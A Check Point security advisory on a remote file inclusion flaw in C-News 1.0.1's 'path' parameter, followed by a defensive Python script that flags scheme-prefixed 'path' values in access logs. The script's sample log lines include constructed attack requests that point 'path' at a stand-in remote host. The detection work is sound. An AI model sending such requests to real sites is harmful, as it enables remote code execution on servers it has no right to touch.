Check Point Advisories

Update Protection against C-News 'path' Parameter File Inclusion Vulnerability

Check Point Reference: CPAI-2006-125
Date Published: 13 Nov 2006
Severity: High
Last Updated: Thursday 03 May, 2007
Source: FrSIRT/ADV-2006-3471
Industry Reference: CVE-2006-4629
Protection Provided by:
Who is Vulnerable? C-News version 1.0.1 and prior
Vulnerability Description: C-News, a script executed in XHTML/CSS that webmasters use for easy PHP and JavaScript presentation, is prone to a remote file inclusion vulnerability. An attacker can exploit this vulnerability to execute arbitrary PHP code on an affected system via a maliciously crafted URL in the 'path' parameter.
Vulnerability Details: The vulnerability is due to input validation errors in multiple scripts that do not validate the 'path' parameter prior to including files. A remote attacker could exploit this flaw via a specially crafted URL. By doing so, the attacker could include various vulnerable scripts and execute arbitrary commands on the vulnerable system.
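For defenders reviewing web server logs, the check below flags requests whose 'path' parameter starts with a URL scheme, which is the request shape the description above refers to. It is an added example, not Check Point's protection or C-News code; the script name `/app/example.php`, the log lines and the list of flagged schemes are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: schemes treated as "not a local directory" when seen in 'path'.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?|php|data)\s*:", re.I)
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_path_values(log_line, param="path"):
    """Return values of `param` in the request URL that begin with a URL scheme."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    try:
        query = urlsplit(m.group(1)).query
    except ValueError:          # malformed request target
        return []
    # parse_qsl percent-decodes once, so http%3A%2F%2F... is seen as http://...
    return [v for k, v in parse_qsl(query, keep_blank_values=True)
            if k == param and REMOTE_SCHEME.match(v)]

def flag_lines(lines, param="path"):
    """Return indexes of log lines carrying a scheme-prefixed `param` value."""
    return [i for i, line in enumerate(lines)
            if suspicious_path_values(line, param)]

# Constructed sample entries (documentation addresses and hostnames only).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Nov/2006:10:00:01 +0000] '
    '"GET /app/example.php?path=includes/ HTTP/1.1" 200 512',
    '192.0.2.44 - - [13/Nov/2006:10:00:07 +0000] '
    '"GET /app/example.php?path=http://remote.example/x.txt HTTP/1.1" 200 87',
    '192.0.2.44 - - [13/Nov/2006:10:00:09 +0000] '
    '"GET /app/example.php?id=3&path=hTtP%3A%2F%2Fremote.example%2Fx.txt HTTP/1.1" 200 87',
]

if __name__ == "__main__":
    for i in flag_lines(SAMPLE_LOG):
        print("review:", SAMPLE_LOG[i])
```

The check covers query-string parameters only; a value sent in a POST body does not appear in an access log and needs inspection at the application or proxy.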

Protection Overview
